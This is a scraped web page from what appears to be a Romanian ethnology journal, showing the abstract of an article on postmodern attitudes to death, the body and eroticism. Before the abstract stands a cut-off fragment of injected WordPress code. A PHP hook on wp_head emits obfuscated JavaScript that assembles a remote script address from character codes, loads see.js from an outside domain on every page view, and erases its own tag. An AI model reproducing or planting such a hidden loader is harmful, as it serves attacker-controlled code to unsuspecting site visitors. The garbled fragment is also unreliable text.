2,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} » Raportarea postmodernă la problema finitudinii Raportarea postmodernă la problema finitudinii | Memoria Ethnologica

Raportarea postmodernă la problema finitudinii

Raportarea postmodernă la problema finitudinii Rezumat Plecând de la cele trei caracteristici ale gândirii postmodernităţii, încercăm, în această lucrare, să schiţăm o imagine a transformărilor profunde din lumea contemporană, inclusiv (sau mai ales) în ceea ce priveşte atitudinea faţă de moarte. Spaima de moarte, care este până la urmă spaima vieţii, a determinat fiinţa umană să-şi construiască o strategie prin care să ”evadeze” din lumea reală într-o lume a ficţiunii unde beneficiază de o libertate totală a alegerii, de gândul fără graniţă. Şi de aici mai avem un singur pas, pe care postmodernul îl face, pentru a gândi nemurirea. Esenţa acestei strategii are în centrul său corpul uman şi, în mod special, instinctul sexual. Se ajunge, în final, să i se aloce corpului uman un rol extrem de important în disputa cu moartea: corpul se opune morţii sacralizându-se, adică metamorfozându-se într-un adevărat ”obiect de cult narcisic”. Frumuseţea şi erotismul devin, astfel, imperative şi laitmotiv ale societăţii postmoderne.

Recenzii

Nu există recenzii până acum.

Fii primul care adaugi o recenzie la „Raportarea postmodernă la problema finitudinii”